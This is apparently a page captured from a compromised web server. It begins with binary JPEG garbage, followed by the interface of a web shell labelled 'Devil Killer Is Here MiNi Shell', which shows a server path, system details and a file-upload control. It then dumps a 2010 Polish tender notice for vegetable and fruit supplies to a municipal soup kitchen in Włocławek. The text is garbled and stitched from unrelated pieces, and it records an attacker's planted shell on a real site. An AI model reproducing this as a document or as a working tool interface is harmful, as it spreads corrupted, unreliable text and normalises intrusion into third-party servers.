JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100713/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100713/207614-N-2010.html

<p class="kh_header"><b>Włocławek: Dostawy warzyw i owoców dla Gospodarstwa Pomocniczego przy Miejskim Ośrodku Pomocy Rodzinie we Włocławku w likwidacji (nr sprawy GP.3431-10/2010)</b><br>
<b>Numer ogłoszenia: 207614 - 2010; data zamieszczenia: 13.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gospodarstwo Pomocnicze przy Miejskim Ośrodku Pomocy Rodzinie we Włocławku w likwidacji , ul. Św. Antoniego 11, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 4110380, faks 54 4110380.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jadlodajniawloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy warzyw i owoców dla Gospodarstwa Pomocniczego przy Miejskim Ośrodku Pomocy Rodzinie we Włocławku w likwidacji (nr sprawy GP.3431-10/2010).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są dostawy niżej wymienionych WARZYW I OWOCÓW dla Gospodarstwa Pomocniczego przy MOPR:
Część I zamówienia (ziemniaki):
1)	Ziemniaki - świeże, średniej wielkości, tzn. o przeciętnej średnicy od. 4 cm, i przeciętnej długości od 6 cm, jednego gatunku, niemieszane, dopuszczalne odmiany: Irga, Sante, Irys, Bryza, Satina, Lord, jadalne, z 2010 r., jednostka miary kilogram, ilość 32.000 kg.
Część II zamówienia (warzywa i owoce):
1)	Marchew - bez naci, świeża, oczyszczona, nieobrana, średniej długości i grubości, tzn o średnicy od 3cm do 4cm i długości od 12cm do 15cm, jednostka miary kilogram, ilość 2.500 kg,
2)	Kapusta czerwona - świeża, w główkach, o minimalnej wadze główki 2,50kg, jednostka miary kilogram, ilość 1.000 kg,
3)	Groch - łuskany, połówki, jednostka miary kilogram, ilość 700 kg,
4)	Fasola drobna - biała, jednostka miary kilogram, ilość 480 kg,
5)	Fasola typu Jaś - duża, jednostka miary kilogram, ilość 700 kg,
6)	Cebula - świeża, twarda  średniej wielkości, tzn. o średnicy od 6cm do 8cm, jednostka miary kilogram, ilość 2.000 kg,
7)	Burak ćwikłowy - średniej wielkości, tzn. o średnicy od 6cm do 10cm lub podłużny o długości od 8 cm do 16 cm i średnicy od 6 cm do 8 cm, jednostka miary kilogram, ilość 2.000 kg,
8)	Nać pietruszki - świeża, o przeciętnej wadze pęczka około 100g i maksymalnej długości 15cm, jednostka miary kilogram, ilość 100 kg,
9)	Koper - świeży, o przeciętnej wadze pęczka około 100g i maksymalnej długości 15cm, jednostka miary kilogram, ilość 120 kg,
10)	Ogórek zielony - twardy, średniej wielkości, tzn. o długości od 12cm do 15cm i średnicy od 3cm do 5cm, w całości, polny, realizacja dostaw w okresie do 30.09.2010 r., jednostka miary kilogram, ilość 500 kg,
11)	Ogórek zielony - twardy, średniej wielkości, tzn. o długości od 15cm do 19cm i średnicy od 3cm do 5cm, w całości, szklarniowy, realizacja dostaw w okresie od 01.10.2010 r., jednostka miary kilogram, ilość 100 kg,
12)	Papryka surowa - czerwona, świeża, cała. Realizacja dostaw w okresie do 30.11.2010 r., jednostka miary kilogram, ilość 500 kg,
13)	Papryka surowa - czerwona, świeża, cała. Realizacja dostaw w okresie od  01.12.2010 r., jednostka miary kilogram, ilość 200 kg,
14)	Pieczarka - świeża, średniej wielkości, tzn. zamknięte kapelusze o średnicy od 3 do 5cm, jednostka miary kilogram, ilość 420 kg, 
15)	Pietruszka korzeń - świeża, bez naci, oczyszczona, nieobrana, średniej długości i grubości, tzn. o średnicy od 3cm do 4cm i długości od 12cm do 15cm, jednostka miary kilogram, ilość 50 kg,
16)	Pomidor - świeży, twardy, nie poobijany, czerwony, cały, średniej wielkości, tzn. o średnicy  od 4cm do 7cm, polny, realizacja dostaw do 30.09.2010 r., jednostka miary kilogram, ilość 410 kg,
17)	Pomidor - świeży, twardy, nie poobijany, czerwony, cały, średniej wielkości, tzn. o średnicy  od 5cm do 8cm, szklarniowy, realizacja dostaw od 01.10.2010r., jednostka miary kilogram, ilość 100 kg,
18)	Por - świeży, oczyszczony, gruby, tzn. o średnicy od 2cm do 4cm, w całości, jednostka miary kilogram, ilość 150 kg,
19)	Sałata - świeża, cała, o średnicy główki od 18 cm do 22cm, nie przerośnięta, szklarniowa. Realizacja dostaw od 19.10.2010 r., jednostka miary kilogram, ilość 100 kg,
20)	Sałata - świeża, cała, o średnicy główki od 18 cm do 22 cm , nie przerośnięta, szklarniowa . Realizacja dostaw do 18.10.2010 r., jednostka miary kilogram, ilość 160 kg,
21)	Seler - świeży, duży, tzn. o średnicy od 10 do 12cm, oczyszczony, bez liści, jednostka miary kilogram, ilość 730 kg,
22)	Kapusta włoska - świeża w główkach, o wadze główki od 1,8kg do 4,0kg, jednostka miary kilogram, ilość 1200 kg,
23)	Jabłka - świeże, całe, średniej wielkości, tzn. o średnicy od 6cm do 8cm, jednostka miary kilogram, ilość 380 kg,
24)	Kapusta biała - świeża w główkach, o wadze główki od 2kg do 4kg, jednostka miary kilogram, ilość 4.500 kg,
25)	Kapusta pekińska - świeża w główkach, o minimalnej średnicy 10cm i minimalnej długości 20cm, jednostka miary kilogram, ilość 570 kg,
26)	Czosnek - w główkach o średniej wielkości, tzn. o przeciętnej średnicy od 3cm do 5cm, o przeciętnej wadze główki od 35g do 50g, jednostka miary kilogram, ilość 8 kg,
27)	Cukinia - twarda, średniej wielkości tzn o długości od 18 cm do 22 cm i średnicy od 7 cm do 9 cm realizacja dostaw do 30.11.2010 r., jednostka miary kilogram, ilość 600 kg,
Część III zamówienia (warzywa kiszone):
1)	Kapusta kwaszona z marchewką, bez konserwantów, jednostka miary kilogram, ilość 3.300 kg,
2)	Ogórek kiszony - twardy, o długości od 8cm do 10cm i średnicy od 3cm do 4cm, w całości, jednostka miary kilogram, ilość 1.300 kg.

2.	Jakość wymienionego wyżej asortymentu nie może odbiegać od jakości towaru dostępnego w ogólnej sieci handlowej. 
3.	Wykonawca zapewnia transport WARZYW I OWOCÓW do siedziby zamawiającego na własny koszt, dlatego cena oferty musi zawierać koszty transportu.
4.	Transport WARZYW I OWOCÓW musi odbywać się w warunkach spełniających wymogi sanitarno - epidemiologiczne.
5.	Miejscem dostaw jest Jadłodajnia przy ul. Św. Antoniego 11 we Włocławku.
6.	Ilość WARZYW I OWOCÓW, o których mowa w pkt III/1 może ulec zmianie ilościowo maksimum o minus 15%.
7.	Zamawiający będzie zamawiał określoną partię towaru telefonicznie lub faksem z jednodniowym wyprzedzeniem, najpóźniej do godziny 13:00.
8.	Dostawy będą odbywać się sukcesywnie przez okres obowiązywania umowy, ilościowo według zapotrzebowania zamawiającego:
- część I i II zamówienia - nie częściej niż pięć razy w tygodniu każdorazowo do godz. 8:00,
- część III zamówienia - nie częściej niż dwa razy w tygodniu każdorazowo do godz. 8:00.
9.	Przedmiot zamówienia musi odpowiadać parametrom ilościowym i jakościowym określonym przez zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.22.11.00-7, 03.22.13.00-9, 03.22.14.00-0, 03.21.21.00-1, 03.22.11.12-4, 03.22.14.10-3, 03.22.12.20-4, 03.22.12.10-1, 03.22.11.13-1, 03.22.11.11-7, 03.22.12.70-9, 03.22.12.30-7, 03.22.12.40-0, 03.22.13.10-2, 03.22.23.21-9, 15.33.11.40-0, 15.33.11.42-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 128.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Spełnienie niniejszego warunku udziału w postępowaniu wykonawca wykazuje przez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu określone w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie realizacji przynajmniej jednej dostawy WARZYW I / LUB OWOCÓW I / LUB ARTYKUŁÓW SPOŻYWCZYCH w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, o wartości równej lub większej niż:
- w przypadku składania oferty na część I zamówienia (ziemniaki) - 11.000,00 zł brutto oraz złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu określone w art. 22 ust. 1 ustawy
- w przypadku składania oferty na część II zamówienia (warzywa i owoce) - 19.000,00 zł brutto oraz złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu określone w art. 22 ust. 1 ustawy
- w przypadku składania oferty na część III zamówienia (warzywa kiszone) - 5.000,00 zł brutto oraz złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu określone w art. 22 ust. 1 ustawy
Wykonawca składający ofertę zgodnie z własnym, wyborem na jedną, dwie lub trzy części zamówienia składa oświadczenie o spełnianiu warunków udziału w postępowaniu określone w art. 22 ust. 1 ustawy tylko w jednym egzemplarzu.
Wykonawca składający ofertę na więcej niż jedną część przedmiotu zamówienia może udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie realizacji przynajmniej jednej dostawy dla każdej części oddzielnie, na którą składa ofertę, o wyżej wskazanych oddzielnych wartościach lub przynajmniej jednej dostawy dla wszystkich lub dwóch części o wartości równej lub większej niż suma wartości minimalnych określonych dla poszczególnych części</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Spełnienie niniejszego warunku udziału w postępowaniu wykonawca wykazuje przez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu określone w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Spełnienie niniejszego warunku udziału w postępowaniu wykonawca wykazuje przez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu określone w art. 22 ust. 1 ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Spełnienie niniejszego warunku udziału w postępowaniu wykonawca wykazuje przez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu określone w art. 22 ust. 1 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmiany urzędowej stawki podatku VAT na artykuły wymienione w formularzu cenowym, stanowiącym załącznik nr 1 do umowy, Wykonawca niezwłocznie i pisemnie powiadamia o tym fakcie Zamawiającego, przytaczając podstawę prawną. Zamawiający zastrzega sobie prawo do uwzględnienia zmiany urzędowej stawki podatku VAT na artykuły wymienione w formularzu cenowym, stanowiącym załącznik nr 1 do umowy w przypadku, kiedy zmiany te są korzystne dla zamawiającego lub nie można było ich przewidzieć w chwili składania oferty przez Wykonawcę</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jadlodajniawloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gospodarstwo Pomocnicze przy MOPR w likwidacji, ul. Św. Antoniego 11, 87-800 Włocławek Biuro I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2010 godzina 10:30, miejsce: Gospodarstwo Pomocnicze przy MOPRw likwidacji, ul. Św. Antoniego 11, 87-800 Włocławek Biuro I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wymagany termin wykonywania zamówienia wynosi 128 dni od dnia zawarcia umowy, ale nie dłużej niż do 31.12.2010r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ziemniaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Ziemniaki - świeże, średniej wielkości, tzn. o przeciętnej średnicy od. 4 cm, i przeciętnej długości od 6 cm, jednego gatunku, niemieszane, dopuszczalne odmiany: Irga, Sante, Irys, Bryza, Satina, Lord, jadalne, z 2010 r., jednostka miary kilogram, ilość 32.000 kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 128.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Marchew - bez naci, świeża, oczyszczona, nieobrana, średniej długości i grubości, tzn o średnicy od 3cm do 4cm i długości od 12cm do 15cm, jednostka miary kilogram, ilość 2.500 kg,
2)	Kapusta czerwona - świeża, w główkach, o minimalnej wadze główki 2,50kg, jednostka miary kilogram, ilość 1.000 kg,
3)	Groch - łuskany, połówki, jednostka miary kilogram, ilość 700 kg,
4)	Fasola drobna - biała, jednostka miary kilogram, ilość 480 kg,
5)	Fasola typu Jaś - duża, jednostka miary kilogram, ilość 700 kg,
6)	Cebula - świeża, twarda  średniej wielkości, tzn. o średnicy od 6cm do 8cm, jednostka miary kilogram, ilość 2.000 kg,
7)	Burak ćwikłowy - średniej wielkości, tzn. o średnicy od 6cm do 10cm lub podłużny o długości od 8 cm do 16 cm i średnicy od 6 cm do 8 cm, jednostka miary kilogram, ilość 2.000 kg,
8)	Nać pietruszki - świeża, o przeciętnej wadze pęczka około 100g i maksymalnej długości 15cm, jednostka miary kilogram, ilość 100 kg,
9)	Koper - świeży, o przeciętnej wadze pęczka około 100g i maksymalnej długości 15cm, jednostka miary kilogram, ilość 120 kg,
10)	Ogórek zielony - twardy, średniej wielkości, tzn. o długości od 12cm do 15cm i średnicy od 3cm do 5cm, w całości, polny, realizacja dostaw w okresie do 30.09.2010 r., jednostka miary kilogram, ilość 500 kg,
11)	Ogórek zielony - twardy, średniej wielkości, tzn. o długości od 15cm do 19cm i średnicy od 3cm do 5cm, w całości, szklarniowy, realizacja dostaw w okresie od 01.10.2010 r., jednostka miary kilogram, ilość 100 kg,
12)	Papryka surowa - czerwona, świeża, cała. Realizacja dostaw w okresie do 30.11.2010 r., jednostka miary kilogram, ilość 500 kg,
13)	Papryka surowa - czerwona, świeża, cała. Realizacja dostaw w okresie od  01.12.2010 r., jednostka miary kilogram, ilość 200 kg,
14)	Pieczarka - świeża, średniej wielkości, tzn. zamknięte kapelusze o średnicy od 3 do 5cm, jednostka miary kilogram, ilość 420 kg, 
15)	Pietruszka korzeń - świeża, bez naci, oczyszczona, nieobrana, średniej długości i grubości, tzn. o średnicy od 3cm do 4cm i długości od 12cm do 15cm, jednostka miary kilogram, ilość 50 kg,
16)	Pomidor - świeży, twardy, nie poobijany, czerwony, cały, średniej wielkości, tzn. o średnicy  od 4cm do 7cm, polny, realizacja dostaw do 30.09.2010 r., jednostka miary kilogram, ilość 410 kg,
17)	Pomidor - świeży, twardy, nie poobijany, czerwony, cały, średniej wielkości, tzn. o średnicy  od 5cm do 8cm, szklarniowy, realizacja dostaw od 01.10.2010r., jednostka miary kilogram, ilość 100 kg,
18)	Por - świeży, oczyszczony, gruby, tzn. o średnicy od 2cm do 4cm, w całości, jednostka miary kilogram, ilość 150 kg,
19)	Sałata - świeża, cała, o średnicy główki od 18 cm do 22cm, nie przerośnięta, szklarniowa. Realizacja dostaw od 19.10.2010 r., jednostka miary kilogram, ilość 100 kg,
20)	Sałata - świeża, cała, o średnicy główki od 18 cm do 22 cm , nie przerośnięta, szklarniowa . Realizacja dostaw do 18.10.2010 r., jednostka miary kilogram, ilość 160 kg,
21)	Seler - świeży, duży, tzn. o średnicy od 10 do 12cm, oczyszczony, bez liści, jednostka miary kilogram, ilość 730 kg,
22)	Kapusta włoska - świeża w główkach, o wadze główki od 1,8kg do 4,0kg, jednostka miary kilogram, ilość 1200 kg,
23)	Jabłka - świeże, całe, średniej wielkości, tzn. o średnicy od 6cm do 8cm, jednostka miary kilogram, ilość 380 kg,
24)	Kapusta biała - świeża w główkach, o wadze główki od 2kg do 4kg, jednostka miary kilogram, ilość 4.500 kg,
25)	Kapusta pekińska - świeża w główkach, o minimalnej średnicy 10cm i minimalnej długości 20cm, jednostka miary kilogram, ilość 570 kg,
26)	Czosnek - w główkach o średniej wielkości, tzn. o przeciętnej średnicy od 3cm do 5cm, o przeciętnej wadze główki od 35g do 50g, jednostka miary kilogram, ilość 8 kg,
27)	Cukinia - twarda, średniej wielkości tzn o długości od 18 cm do 22 cm i średnicy od 7 cm do 9 cm realizacja dostaw do 30.11.2010 r., jednostka miary kilogram, ilość 600 kg,.</p></li>
